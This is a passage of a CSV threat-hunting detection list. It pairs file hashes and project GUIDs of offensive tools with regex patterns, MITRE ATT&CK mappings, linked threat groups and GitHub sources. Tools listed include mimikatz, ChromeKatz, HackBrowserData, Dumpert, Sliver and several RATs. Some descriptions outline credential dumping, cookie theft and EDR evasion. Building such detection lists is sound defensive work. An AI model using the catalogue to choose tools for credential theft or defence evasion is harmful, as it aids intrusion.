TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44694" "*fde1b109f9704ff7.css*",".{0,1000}fde1b109f9704ff7\.css.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","44695" "*fde22ab519e821b78566ad716fe961d55cec7a447be32e5405f46d10f2e9b233*",".{0,1000}fde22ab519e821b78566ad716fe961d55cec7a447be32e5405f46d10f2e9b233.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","44696" "*fde28cc5a25646c7b2579cd11a6914077500fabb172f8b44fd56bf9cfbad0511*",".{0,1000}fde28cc5a25646c7b2579cd11a6914077500fabb172f8b44fd56bf9cfbad0511.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","44697" "*fde8744f64a41afea0aca93478a8e310a86dd3ac1e716bfdd6687e954ad2231e*",".{0,1000}fde8744f64a41afea0aca93478a8e310a86dd3ac1e716bfdd6687e954ad2231e.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","0","#filehash","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","44698" 
"*fdeb5626b8c7d92daf188d05564398134d3dd50c9d1d2b09352a5d5a0d2757ee*",".{0,1000}fdeb5626b8c7d92daf188d05564398134d3dd50c9d1d2b09352a5d5a0d2757ee.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44700" "*FDF5A0F3-73DA-4A8B-804F-EDD499A176EF*",".{0,1000}FDF5A0F3\-73DA\-4A8B\-804F\-EDD499A176EF.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#GUIDproject","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","44702" "*fdfbc173fa9fe1094f92f5141b4f257cf071baf69eb62f86b3ba547196eb5a60*",".{0,1000}fdfbc173fa9fe1094f92f5141b4f257cf071baf69eb62f86b3ba547196eb5a60.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44704" "*fdfbfc07248c3359d9f1f536a406d4268f01ed63a856bd6cef9dccb3cf4f2376*",".{0,1000}fdfbfc07248c3359d9f1f536a406d4268f01ed63a856bd6cef9dccb3cf4f2376.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","44705" "*FE068381-F170-4C37-82C4-11A81FE60F1A*",".{0,1000}FE068381\-F170\-4C37\-82C4\-11A81FE60F1A.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","44706" "*fe06cf10cad44865c87cb7a2eef5d3b7614309ce016389add8260f19f16d770b*",".{0,1000}fe06cf10cad44865c87cb7a2eef5d3b7614309ce016389add8260f19f16d770b.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","44707" 
"*fe0a341f1d837cff5ed9b847e0c61d4c9d5f183c00eff93eeb8c1f0ac3730452*",".{0,1000}fe0a341f1d837cff5ed9b847e0c61d4c9d5f183c00eff93eeb8c1f0ac3730452.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44708" "*FE102D27-DEC4-42E2-BF69-86C79E08B67D*",".{0,1000}FE102D27\-DEC4\-42E2\-BF69\-86C79E08B67D.{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","0","#GUIDproject","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","44710" "*fe19fcf12c8c18e41b73c3888d596a488f0a31c44ed459cba6d101660bfd7e80*",".{0,1000}fe19fcf12c8c18e41b73c3888d596a488f0a31c44ed459cba6d101660bfd7e80.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","44711" "*fe19fcf12c8c18e41b73c3888d596a488f0a31c44ed459cba6d101660bfd7e80*",".{0,1000}fe19fcf12c8c18e41b73c3888d596a488f0a31c44ed459cba6d101660bfd7e80.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","44712" 
"*fe1ae959f9af863a11cefad541eb791a01e5bb9931cf5c57e478236ddad92ae6*",".{0,1000}fe1ae959f9af863a11cefad541eb791a01e5bb9931cf5c57e478236ddad92ae6.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#filehash","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","44713" "*fe1e030312bcb26de66eea442200e4d73ff88307784fe6f1f72f776efcd5e9be*",".{0,1000}fe1e030312bcb26de66eea442200e4d73ff88307784fe6f1f72f776efcd5e9be.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","44714" "*fe1e030312bcb26de66eea442200e4d73ff88307784fe6f1f72f776efcd5e9be*",".{0,1000}fe1e030312bcb26de66eea442200e4d73ff88307784fe6f1f72f776efcd5e9be.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","44715" "*fe22bb52058886459e0ff6f9c1c70b4604b15c30b5f1e3ebfc58305d4e94a7e3*",".{0,1000}fe22bb52058886459e0ff6f9c1c70b4604b15c30b5f1e3ebfc58305d4e94a7e3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44717" "*fe2952ae150d2a92e6ef03f68022dc10a792fb8c3e44a46cf2ce1e095e45b9d4*",".{0,1000}fe2952ae150d2a92e6ef03f68022dc10a792fb8c3e44a46cf2ce1e095e45b9d4.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","44719" "*fe2cc64a77ca3a7620a9ddec10f9f6e80769132f5587cece5dd03d419782481d*",".{0,1000}fe2cc64a77ca3a7620a9ddec10f9f6e80769132f5587cece5dd03d419782481d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44720" "*fe3714ffa85da624ca247913dfe99fb303ba4217a6e95bc63bf6823874f40b49*",".{0,1000}fe3714ffa85da624ca247913dfe99fb303ba4217a6e95bc63bf6823874f40b49.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44722" "*fe43248d33a0e7bd20c619186b757febef4508bea3787671d3ecc95ed742b729*",".{0,1000}fe43248d33a0e7bd20c619186b757febef4508bea3787671d3ecc95ed742b729.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44725" "*FE4414D9-1D7E-4EEB-B781-D278FE7A5619*",".{0,1000}FE4414D9\-1D7E\-4EEB\-B781\-D278FE7A5619.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/rasta-mouse/RuralBishop","1","0","#GUIDproject","N/A","10","2","107","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z","44726" "*fe44d88aa5c763905fc4a7b600ac6545f9d169eca637796e28a08a432969f5bc*",".{0,1000}fe44d88aa5c763905fc4a7b600ac6545f9d169eca637796e28a08a432969f5bc.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","44727" "*fe5516f92808349f91469cafff07d9b370f3035e31161ce33f56c08bce13925a*",".{0,1000}fe5516f92808349f91469cafff07d9b370f3035e31161ce33f56c08bce13925a.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","44729" "*fe5fc5bfd15a4c3dbf5d057bcf109d4f4d1b8835085acca6c13508e7baf074a3*",".{0,1000}fe5fc5bfd15a4c3dbf5d057bcf109d4f4d1b8835085acca6c13508e7baf074a3.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR 
- BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","44731" "*fe5fc5bfd15a4c3dbf5d057bcf109d4f4d1b8835085acca6c13508e7baf074a3*",".{0,1000}fe5fc5bfd15a4c3dbf5d057bcf109d4f4d1b8835085acca6c13508e7baf074a3.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","44732" "*fe625188da34d9b6551ce1c34627cefd1a3e4da78f1dacc9442d04bd0ea944b0*",".{0,1000}fe625188da34d9b6551ce1c34627cefd1a3e4da78f1dacc9442d04bd0ea944b0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44733" "*FE66CDDF-8E33-4153-81AF-24BE392698D8*",".{0,1000}FE66CDDF\-8E33\-4153\-81AF\-24BE392698D8.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","44734" "*fe6a409a936601232cf6d934c8fbf97509086c77026490bbf1d6f795091a006f*",".{0,1000}fe6a409a936601232cf6d934c8fbf97509086c77026490bbf1d6f795091a006f.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","44735" "*fe6f27e7f2f8b93fd436a7ec4e99c0e79b40e639772b5c8e378406c7b867bd63*",".{0,1000}fe6f27e7f2f8b93fd436a7ec4e99c0e79b40e639772b5c8e378406c7b867bd63.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44736" "*fe798793251dc5cb179923e733865ea5cbc2f4636a849111de78930c199b487b*",".{0,1000}fe798793251dc5cb179923e733865ea5cbc2f4636a849111de78930c199b487b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44738" "*fe7c0b6a562e3939e5ae246876cffa6ec2f7c45e70154c50ed8afc44196c7a08*",".{0,1000}fe7c0b6a562e3939e5ae246876cffa6ec2f7c45e70154c50ed8afc44196c7a08.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44739" "*fe7fef945a2f5a531f50f6ccef4b40cad832f1e0ffe4d424028379f0318c0c11*",".{0,1000}fe7fef945a2f5a531f50f6ccef4b40cad832f1e0ffe4d424028379f0318c0c11.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - 
T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","44742" "*fe8498483b5c12b580441a1a03602e7087b2387ee692f2648c79023864985e65*",".{0,1000}fe8498483b5c12b580441a1a03602e7087b2387ee692f2648c79023864985e65.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44744" "*fe8a247e683cf8041cb460365a29793bacf26f8214b82a7b44d2f8fad3b0af12*",".{0,1000}fe8a247e683cf8041cb460365a29793bacf26f8214b82a7b44d2f8fad3b0af12.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","44745" "*fe8a647aa7f8ac6084ddd7cae6d861a58f2a51620e4d9044b80722b00fe2f2d4*",".{0,1000}fe8a647aa7f8ac6084ddd7cae6d861a58f2a51620e4d9044b80722b00fe2f2d4.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - 
TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","44746" "*fe8db7541bc0c9d05dbd2e44e5eaa2bfd5c79968983860416636ea2792abfa5e*",".{0,1000}fe8db7541bc0c9d05dbd2e44e5eaa2bfd5c79968983860416636ea2792abfa5e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","44748" "*FE8F0D23-BDD1-416D-8285-F947BA86D155*",".{0,1000}FE8F0D23\-BDD1\-416D\-8285\-F947BA86D155.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","0","#GUIDproject","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","44749" "*fe8fcb5a9335c55ef7fc6c7493e9ee1b13545c194d7ee3bdbb4a9dc943592cd7*",".{0,1000}fe8fcb5a9335c55ef7fc6c7493e9ee1b13545c194d7ee3bdbb4a9dc943592cd7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44750" "*fea01b74-7a60-4142-a54d-7aa8f6471c00*",".{0,1000}fea01b74\-7a60\-4142\-a54d\-7aa8f6471c00.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login 
page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","#GUIDproject","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","44752" "*feb09cc39b1520d228e9e9274500b8c229016d6fc8018a2bf19aa9d3601492c5*",".{0,1000}feb09cc39b1520d228e9e9274500b8c229016d6fc8018a2bf19aa9d3601492c5.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","44753" "*feb7a634c9e832fa1e4f9a42729e52277d3d651c031fb86517304b4eb99fa35b*",".{0,1000}feb7a634c9e832fa1e4f9a42729e52277d3d651c031fb86517304b4eb99fa35b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44754" "*feb92ee6c4408e3e4b59d0b51220cfcc2b4713cf53a15da2fe4d27e7c5f74c0b*",".{0,1000}feb92ee6c4408e3e4b59d0b51220cfcc2b4713cf53a15da2fe4d27e7c5f74c0b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44755" 
"*feb958c545e2fc761140219d66fe588b29fce660d7ba132674863b2149de4891*",".{0,1000}feb958c545e2fc761140219d66fe588b29fce660d7ba132674863b2149de4891.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","44756" "*febf23d1ae51d53d18aff75baa9b3c8f13775b5399e6d15ad138d1a9dcc2b871*",".{0,1000}febf23d1ae51d53d18aff75baa9b3c8f13775b5399e6d15ad138d1a9dcc2b871.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - 